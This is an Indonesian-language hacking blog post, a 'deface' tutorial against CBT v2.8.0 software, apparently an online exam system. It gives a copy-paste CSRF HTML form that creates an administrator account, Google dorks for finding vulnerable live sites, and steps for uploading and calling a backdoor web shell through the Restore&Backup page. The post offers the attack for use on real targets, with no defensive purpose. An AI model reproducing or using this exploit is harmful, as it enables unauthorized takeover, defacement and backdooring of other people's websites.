Yow Exploiter,
Kembali lagi ke My Blog xixi..
Kali ini kita akan belajar cara deface CBT v2.8.0 Add Admin yang di temukan oleh ecchiexploit

Bahan Bahan :
- Kouta :v
- Csrf :
*kalian copas aja
<html>
<head></head>
<body>
<form action="localhost/admin/?pg=pengawas" method="post">
<label>nip</label>
<input type="text" name="nip" value="123761717" required="true" />
<br>
<label>nama</label>
<input type="text" name="nama" required="true" />
<br>
<label>username</label>
<input type="text" name="username" required="true" />
<br>
<label>password</label>
<input type="password" name="pass1" required="true" />
<br>
<label>ulang password</label>
<input type="password" name="pass2" required="true" />
<br>
<button type="submit" name="submit">simpan</button>
</form>
</body>
</html>
- Dork :
"CBT v2.8.0" intitle:login
"Responsive Image" + "Support" intitle:Login
- Shell Backdoor

Langsung aja, pertama kalian dorking dulu pake dork diatas :D
Jangan lupa buat file csrf.html dan masukan kode diatas xixixi... 

Nah jika udah dapet live targetnya kalian buka file csrf.htmlnya lalu edit di bagian :
<body>
<form action="localhost/admin/?pg=pengawas" method="post">
Localhostnya kalian ganti menjadi live target kalian... 
Jika sudah kalian save filenya lalu buka di chrome atau browser kesayangan anda :v

Nah tampilannya akan seperti dibawah ini :
Tinggal kalian masukan terserah kalian xixix.. 
Tapi saya mengisi semuanya dengan admin hehehe

 Lalu klik simpan.
Kalian login dengan User Dan Pass yang kalian tadi pilih.

Jika Vuln Akan Langsung masuk Dashboad :D seperti gambar dibawah :
Cara upload shellnya :
Klik Pengaturan >> Lalu Ke Restore&Backup :D >> Up Shell Kalian >>  Lalu kalian klik buttonnya

Cara manggil shellnya :
contoh : namaweb.com/admin/namashellkalian.php
atau 
- namaweb.com/[Path]/admin/namashellkalian.php

Semoga Bermanfaat :D
Referensi :